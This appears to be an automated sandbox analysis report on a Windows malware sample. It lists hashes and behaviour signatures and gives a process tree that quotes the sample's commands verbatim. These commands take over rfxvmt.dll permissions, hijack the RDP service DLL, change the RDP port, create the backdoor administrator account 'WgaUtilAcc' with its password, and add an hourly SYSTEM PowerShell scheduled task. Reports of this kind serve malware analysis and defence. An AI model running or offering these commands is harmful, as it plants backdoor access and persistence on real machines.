Analysis
-
max time kernel
135s -
max time network
94s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
25-11-2022 08:29
Static task
static1
Behavioral task
behavioral1
Sample
48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe
Resource
win10v2004-20220901-en
General
-
Target
48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe
-
Size
2.3MB
-
MD5
8640faa50991a260de7cf73ea56b5461
-
SHA1
d2a2f5b1a4c3643290e8ce378f3c497c9b6f94d4
-
SHA256
48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0
-
SHA512
0ab932f92e210b9171f8fa7cd18ac2ab94a552865bc0fdd72cdc1ebc52e85392730722f3563fd6bb9fc1635e63519d764b89ce600caafa29a5abb506611334cf
-
SSDEEP
49152:sc+3+iySeZ3sIbHhrQpfHm0RJHqulcsRycArKFU:sca+iTeDQfHm0RJHq9hcArd
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exepid process 1368 icacls.exe 1380 icacls.exe 856 icacls.exe 1284 icacls.exe 1712 icacls.exe 1620 icacls.exe 2016 icacls.exe 1072 takeown.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "%SystemRoot%\\help\\temp222.dat" reg.exe -
Processes:
resource yara_rule \Windows\Help\temp221.dat upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1076 powershell.exe -
Loads dropped DLL 3 IoCs
Processes:
48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exepid process 1980 48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe 744 744 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exepid process 1368 icacls.exe 1380 icacls.exe 856 icacls.exe 1284 icacls.exe 1712 icacls.exe 1620 icacls.exe 2016 icacls.exe 1072 takeown.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 3 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\help\temp221.dat powershell.exe File created C:\Windows\help\temp220.dat powershell.exe File created C:\Windows\help\temp222.dat powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1044 timeout.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepid process 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe 1076 powershell.exe -
Suspicious behavior: LoadsDriver 4 IoCs
Processes:
pid process 744 744 744 744 -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeicacls.exedescription pid process Token: SeDebugPrivilege 1076 powershell.exe Token: SeRestorePrivilege 1380 icacls.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exewscript.execmd.exepowershell.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 1980 wrote to memory of 1560 1980 48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe wscript.exe PID 1980 wrote to memory of 1560 1980 48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe wscript.exe PID 1980 wrote to memory of 1560 1980 48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe wscript.exe PID 1980 wrote to memory of 1560 1980 48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe wscript.exe PID 1560 wrote to memory of 1108 1560 wscript.exe cmd.exe PID 1560 wrote to memory of 1108 1560 wscript.exe cmd.exe PID 1560 wrote to memory of 1108 1560 wscript.exe cmd.exe PID 1108 wrote to memory of 1044 1108 cmd.exe timeout.exe PID 1108 wrote to memory of 1044 1108 cmd.exe timeout.exe PID 1108 wrote to memory of 1044 1108 cmd.exe timeout.exe PID 1108 wrote to memory of 1076 1108 cmd.exe powershell.exe PID 1108 wrote to memory of 1076 1108 cmd.exe powershell.exe PID 1108 wrote to memory of 1076 1108 cmd.exe powershell.exe PID 1076 wrote to memory of 1072 1076 powershell.exe takeown.exe PID 1076 wrote to memory of 1072 1076 powershell.exe takeown.exe PID 1076 wrote to memory of 1072 1076 powershell.exe takeown.exe PID 1076 wrote to memory of 1368 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 1368 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 1368 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 1380 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 1380 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 1380 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 856 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 856 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 856 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 1284 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 1284 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 1284 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 1712 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 1712 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 1712 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 1620 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 1620 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 1620 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 2016 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 2016 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 2016 1076 powershell.exe icacls.exe PID 1076 wrote to memory of 1580 1076 powershell.exe reg.exe PID 1076 wrote to memory of 1580 1076 powershell.exe reg.exe PID 1076 wrote to memory of 1580 1076 powershell.exe reg.exe PID 1076 wrote to memory of 288 1076 powershell.exe reg.exe PID 1076 wrote to memory of 288 1076 powershell.exe reg.exe PID 1076 wrote to memory of 288 1076 powershell.exe reg.exe PID 1076 wrote to memory of 1952 1076 powershell.exe net.exe PID 1076 wrote to memory of 1952 1076 powershell.exe net.exe PID 1076 wrote to memory of 1952 1076 powershell.exe net.exe PID 1952 wrote to memory of 884 1952 net.exe net1.exe PID 1952 wrote to memory of 884 1952 net.exe net1.exe PID 1952 wrote to memory of 884 1952 net.exe net1.exe PID 1232 wrote to memory of 936 1232 cmd.exe net.exe PID 1232 wrote to memory of 936 1232 cmd.exe net.exe PID 1232 wrote to memory of 936 1232 cmd.exe net.exe PID 936 wrote to memory of 1700 936 net.exe net1.exe PID 936 wrote to memory of 1700 936 net.exe net1.exe PID 936 wrote to memory of 1700 936 net.exe net1.exe PID 1932 wrote to memory of 1200 1932 cmd.exe net.exe PID 1932 wrote to memory of 1200 1932 cmd.exe net.exe PID 1932 wrote to memory of 1200 1932 cmd.exe net.exe PID 1200 wrote to memory of 1452 1200 net.exe net1.exe PID 1200 wrote to memory of 1452 1200 net.exe net1.exe PID 1200 wrote to memory of 1452 1200 net.exe net1.exe PID 964 wrote to memory of 1040 964 cmd.exe net.exe PID 964 wrote to memory of 1040 964 cmd.exe net.exe PID 964 wrote to memory of 1040 964 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe"C:\Users\Admin\AppData\Local\Temp\48a73b3a40e13d6f6d611522c618043ef14d870be5fb4b87e9c789cba9ca2de0.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\pomog.vbs2⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rename C:\Users\Admin\AppData\Local\Temp\pomog.txt pomog.ps1&timeout -t 3& powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\pomog.ps13⤵
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\system32\timeout.exetimeout -t 34⤵
- Delays execution with timeout.exe
PID:1044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\pomog.ps14⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1072 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1368 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1380 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:856 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1284 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1712 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1620 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2016 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f5⤵PID:1580
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\temp222.dat /f5⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:288 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵PID:884
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f5⤵PID:1920
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f5⤵PID:276
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 44zI4UVZ /add1⤵
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 44zI4UVZ /add2⤵
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 44zI4UVZ /add3⤵PID:1700
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1452
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" ZERMMMDR$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" ZERMMMDR$ /ADD2⤵PID:1040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" ZERMMMDR$ /ADD3⤵PID:1372
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1480
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:2036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1284
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 44zI4UVZ1⤵PID:2000
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 44zI4UVZ2⤵PID:2016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 44zI4UVZ3⤵PID:1580
-
C:\Windows\System32\cmd.execmd /C schtasks /create /tn 48957 /tr "powershell -nop -ep bypass -f c:\windows\help\98991.ps1" /ru system /sc hourly /mo 11⤵PID:988
-
C:\Windows\system32\schtasks.exeschtasks /create /tn 48957 /tr "powershell -nop -ep bypass -f c:\windows\help\98991.ps1" /ru system /sc hourly /mo 12⤵
- Creates scheduled task(s)
PID:1204
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.4MB
MD5ac1bafbc7e973e69602d70d8e0ec3829
SHA165ba4b45cbbccd85ec5c155cd7c41736e5a3382c
SHA256524a02b242b293b05925caa4def1626e9e0facf971d779999ecbc2d2898ed194
SHA5127b71bc5ee36d44db6b2e226b588d42ed3f67cd73a188f801809dda6fdd37275b57129a2a41dd8f844b26e61c82aa205ab1182e842b7cb728e4f46fb2a233f1d6
-
Filesize
36KB
MD52c50ffba8c7d98a9cb5fec3c2a6913df
SHA1849b62f4911551b69cab9bc5ca6cf1af7ca28fc0
SHA256f510b64ebae6560c829f3b7081bf6073633ad5cb089bf2fb7b86ae0ad96267b0
SHA5127d28e6f5d30c918a0324d487828de7cdbf22c6262a67927f110155a02f00f902263037eb0d1eff1ca31be744a0026d3081a5f74d7d47fc1e86b13c9f243ce750
-
Filesize
62KB
MD50c34e2096fc530535d1fb38b8e9f68a6
SHA1ac9912a3bf5da42cfa9bdc5a48a41c5336980f4a
SHA256fee2dc3b455813797160264ecebcda7c34707fdafc96320f843891500971fedb
SHA5120b4b21aecaff1b0e3a3ea9611954a4a32d3ae73c456373b0d6375d661192e09c608175de61abafc2f8bf264a7817a753052e1767ba3cb0755350af9966d66bdf
-
Filesize
198KB
MD5074ff8eac2103666760749711597b336
SHA11c349951336d7059807d89163e9c118ef1a6bf26
SHA2560e22f549a70422bade6e5a19b9efe06c816e90f02f161882a24dde795cb33172
SHA5127c1f7397367e11ee62cc62f62b059b671409097dd857873c31346d704b0ef7b2d82e318fb8ed1eee3ddb3804ab1f13268190240e2c0ad213c6764118ccdaa237
-
Filesize
102B
MD5b72f79c10c59890f9049cb5a6332d680
SHA14d3f6fa8a15c2fcaee275983e072207fe1c5b277
SHA2566589829ca13d08781f77e050907225885692cf6bd64f930ca6c9f9d71740942a
SHA512f103bca53aac43bcde9a4f9d7da62615861014d6b7e2e4ea775f04a551bf10f5e075a1863d575242d6a927eecc805b47ac5aca67b44a04eb36acb18cf73947dd
-
Filesize
39KB
MD5f140a509e9385574c51a0b6c53d89638
SHA1c0471a4aa09ccb2fae2214d9fddc758058e4f92f
SHA256a15fcc9cd5680ba9bb513b46765554d68e8a11fb71826c25bce8cbc6be448af2
SHA51272baa25c367db6c922c692e6bd9052cb426438570d13e78577f482549a54e51497c5b3ed58dedabf261945a1b8dcb68833b52fdc7dfef9341f0a36c308ce4e3c
-
Filesize
142B
MD511789c8be9e4201c26d57b0e192489de
SHA16917bcfbeb124c48dbc1d08956f84e84b5a53960
SHA256ce810ffdf9f3462bd9334993b43f3209a5662127519f336ef7d440201f0fa8db
SHA512dcd2296e9174089d9b4802868cc1f3997ec814b8ab7a60b0a59af9f95742c53dac0fcf07c250f08041e91dcdfaaef1f3493b686c4f6a205543e06f2c801d8804
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
11KB
MD5fbe295e5a1acfbd0a6271898f885fe6a
SHA1d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA5122cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06
-
Filesize
940KB
MD5666b20fd3f3d244f984a470e9d468f53
SHA11ed4fcf1994664b8cf511526f54996055f883f95
SHA2565d9227777bce252a4f1dfbd44e539e0b689cbffa831d8682f90c4df94bdb9873
SHA5129f0e625ae92a8d81f381e4b2e8dd489d30001481dfee361aca624f53b43177e95d8bf3cc982fd56671eaa59338ea9587464b7ec802885534b3b14300daf1b432
-
Filesize
123KB
MD51e38a16381d1a98127bade41544334cf
SHA108766e656a810c1e31fe86bfe48eba4483e21bba
SHA256f832cf40fd4ba232b6005b2d487b40e97761351d6d1f10751fecdaa5a5a579a3
SHA5129a14f5bbfc76cfa71289edde85363bde7e14c95295da5fed7d8d24bce2379436083f4794955574e4bbe2ad9a0284c93cf4a09952bd0f24f1fce10462ad899635